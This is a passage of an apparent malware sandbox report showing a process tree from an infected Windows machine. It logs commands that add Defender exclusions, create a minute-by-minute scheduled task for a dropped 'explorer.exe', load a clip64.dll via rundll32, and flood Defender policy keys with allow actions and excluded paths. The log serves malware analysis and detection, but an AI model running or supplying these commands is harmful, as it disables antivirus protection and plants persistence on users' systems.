                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:428
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                                                  3⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2076
                                                                • C:\Windows\System32\schtasks.exe
                                                                  "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\Users\Admin\AppData\Roaming\explorer.exe"
                                                                  3⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:4144
                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                2⤵
                                                                • Blocklisted process makes network request
                                                                • Loads dropped DLL
                                                                PID:2200
                                                              • C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5056
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4968 -ip 4968
                                                              1⤵
                                                                PID:2200
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4880 -ip 4880
                                                                1⤵
                                                                  PID:3084
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 2280 -ip 2280
                                                                  1⤵
                                                                    PID:4648
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                    1⤵
                                                                      PID:1424
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                      1⤵
                                                                        PID:2752
                                                                      • C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:3484
                                                                      • C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                        C:\Users\Admin\AppData\Roaming\explorer.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:968
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC704.tmp\Install.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\7zSC704.tmp\Install.exe Wt /KYDdidXSvU 385118 /S
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Drops desktop.ini file(s)
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:3188
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                          2⤵
                                                                            PID:1652
                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                              3⤵
                                                                                PID:2320
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                  4⤵
                                                                                    PID:236
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                      5⤵
                                                                                        PID:648
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                    3⤵
                                                                                      PID:5000
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                        4⤵
                                                                                          PID:4876
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                            5⤵
                                                                                              PID:1068
                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                          3⤵
                                                                                            PID:1332
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                              4⤵
                                                                                                PID:2464
                                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                  5⤵
                                                                                                    PID:4944
                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                3⤵
                                                                                                  PID:1224
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                    4⤵
                                                                                                      PID:3984
                                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                        5⤵
                                                                                                          PID:4648
                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                      3⤵
                                                                                                        PID:4612
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                          4⤵
                                                                                                            PID:1976
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                              5⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:1156
                                                                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                6⤵
                                                                                                                  PID:2368
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                          2⤵
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:2860
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:4284
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                4⤵
                                                                                                                  PID:2340
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:3068
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:2020
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:2588
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:4672
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:1328
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:4304
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:1136
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:4344
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:2996
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:2252
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:3392
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:1524
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:1704
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:2256
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:3052
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:2076
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4500
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5056
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3244
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3928
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3616
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1156
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4992
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4148
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3440
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:440
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:72
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:4736
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4000
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:1624
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3456
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:948
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4944
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
